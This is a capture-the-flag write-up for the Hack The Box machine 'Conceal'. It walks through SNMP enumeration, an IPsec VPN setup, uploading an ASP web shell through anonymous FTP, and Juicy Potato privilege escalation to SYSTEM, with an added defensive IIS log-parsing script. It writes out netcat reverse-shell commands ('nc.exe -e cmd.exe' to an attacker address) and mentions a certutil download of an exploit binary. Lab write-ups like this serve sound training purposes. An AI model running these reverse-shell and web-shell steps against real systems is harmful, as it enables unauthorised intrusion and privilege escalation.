# Hack The Box - Conceal

## Quick Summary

Hey guys, today Conceal retired and here's my write-up about it. Conceal was a straightforward, fun box; the only tricky part is establishing the IPsec connection in order to reach some filtered services. That first part involved some guessing, but after that everything is simple and very straightforward. I liked this machine and it was a very fun one. It's a Windows machine and its IP is 10.10.10.116; I added it to /etc/hosts as conceal.htb. Let's jump right in.

## Nmap

As always, we will start with nmap to scan for open ports and services:

```bash
nmap -sV -sT -sC conceal.htb
```

And we got nothing!

Since the TCP scan found nothing, I ran another nmap UDP scan on all ports:

```bash
nmap -vvv -sU -o nmapudp conceal.htb --max-retries 0
```

The output was too long, so I will only show the important part:

nmap could not determine the state of port 161, but it showed port 500 as open.
I ran a third scan against ports 161 and 500 only:

```bash
nmap -p 161,500 -sV -sU -sC conceal.htb
```

Full output:

We have two services to enumerate: isakmp, which is IKE (the key exchange used to set up IPsec), and snmp.

## Snmp Enumeration

I started with snmpwalk:

```bash
snmpwalk -c public -v 1 conceal.htb
```

The output was very long, but we only need this first part:

We have a password hash for the IPsec connection: 9C8B1A372B1878851BE2C097031B6E43
I used CrackStation to crack it and got this result:

Great! Now we need to enumerate the IKE VPN service to learn how to connect to it.

## ike-scan, Setting up The Connection

I ran ike-scan and got these results:

I installed strongSwan to set up the IPsec connection. With the help of the information I got from ike-scan and some guessing, I came up with this configuration, which worked:

/etc/ipsec.conf:

/etc/ipsec.secrets:

I started ipsec and then brought the connection up:

```bash
ipsec start
ipsec up rick-to-conceal
```

It worked fine; now that we are connected to the VPN, let's see what new services we can reach.

## Nmap (Second Time)

```bash
nmap -sV -sT -sC conceal.htb
```

We got FTP on port 21, HTTP on port 80 and SMB on port 445. I wanted to check FTP first and see if I could authenticate anonymously.

## FTP, File Upload, Reverse Shell and User Flag

Anonymous login worked, but there was literally nothing on that FTP server. I uploaded a test file to check whether I had write permission on the FTP server, and I did.

I checked the HTTP service and there was only the default IIS page:

I ran gobuster with /usr/share/wordlists/dirb/common.txt and got only one directory, /upload:

I went to /upload and found my test file there, so the FTP root is served directly by IIS:

Great! I uploaded an ASP shell to get remote code execution:

shell.asp:

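The root cause on this box is an anonymous-writable FTP directory that IIS serves with its ASP script handler still enabled. As an added defender-side example (not part of the original write-up), the script below parses IIS W3C extended logs and flags any request for a server-side script under such a writable path; the log excerpt, the host 10.10.10.116 entries and the client address 10.10.14.5 are constructed.

```python
"""Added example (not from the write-up): flag requests for server-side
scripts under an IIS path that is also an anonymous-writable FTP root.
The log lines and the client address 10.10.14.5 are constructed."""
import re
from urllib.parse import unquote

# Extensions IIS passes to the classic ASP / ASP.NET handlers when they are enabled.
SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx", ".asa", ".cer", ".cdx"}

# Constructed IIS W3C extended log excerpt, one request per line.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2019-01-01 00:00:01 10.10.10.116 GET / - 80 - 10.10.14.5 Mozilla/5.0 - 200 0 0 12
2019-01-01 00:00:02 10.10.10.116 GET /upload/test.txt - 80 - 10.10.14.5 Mozilla/5.0 - 200 0 0 3
2019-01-01 00:00:03 10.10.10.116 GET /upload/shell.asp - 80 - 10.10.14.5 Mozilla/5.0 - 200 0 0 40
2019-01-01 00:00:04 10.10.10.116 GET /upload/ - 80 - 10.10.14.5 gobuster/3.0 - 200 0 0 5
"""

def parse_w3c(lines):
    """Yield one dict per request, taking column names from the #Fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_script_hits(lines, writable_prefixes=("/upload/",)):
    """Return (timestamp, client, uri, status) for each script served from a writable path."""
    prefixes = tuple(p.lower() for p in writable_prefixes)
    hits = []
    for row in parse_w3c(lines):
        stem = unquote(row["cs-uri-stem"]).lower()   # decode %xx tricks before matching
        ext = re.search(r"\.[a-z0-9]+$", stem)
        if ext and ext.group(0) in SCRIPT_EXTS and stem.startswith(prefixes):
            hits.append((f'{row["date"]} {row["time"]}', row["c-ip"], stem, row["sc-status"]))
    return hits

if __name__ == "__main__":
    for hit in find_script_hits(SAMPLE_LOG.splitlines()):
        print("script served from writable path:", *hit)
```

A status of 200 on such a request means the handler ran the file; the fix is to disable script execution for the upload directory (or stop serving the FTP root from the web root at all).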
I got a PowerShell reverse shell:

We got user.

## SeImpersonatePrivilege, Juicy Potato, Privilege Escalation and Root Flag

After getting user, the privilege escalation is easy and straightforward. Before doing any enumeration I checked my privileges as Destitute and found that I had SeImpersonatePrivilege.

This means we can apply the well-known Juicy Potato attack. You can read about it on the official GitHub repository. We need to know the Windows version to pick the right CLSID:

```cmd
systeminfo
```

It's Microsoft Windows 10 Enterprise. I got the CLSID of wuauserv from here, which is:

```
{e60687f7-01a1-40aa-86ac-db1cbf673334}
```

I got a compiled binary of Juicy Potato from the GitHub repository. I hosted it on a Python simple HTTP server and then downloaded it onto the machine with certutil:

However, I had some problems with my PowerShell reverse shell and it couldn't run juicypotato.exe properly, so I got another cmd shell with nc:

```cmd
nc.exe -e cmd.exe 10.10.xx.xx 1339
```

I created a bat file that executes `nc.exe -e cmd.exe 10.10.xx.xx 1340` to get me a reverse shell:

Then I ran juicypotato.exe and made it execute that bat file:

It worked fine and we got a reverse shell as nt authority\system.

And we owned root!

That's it, feedback is appreciated!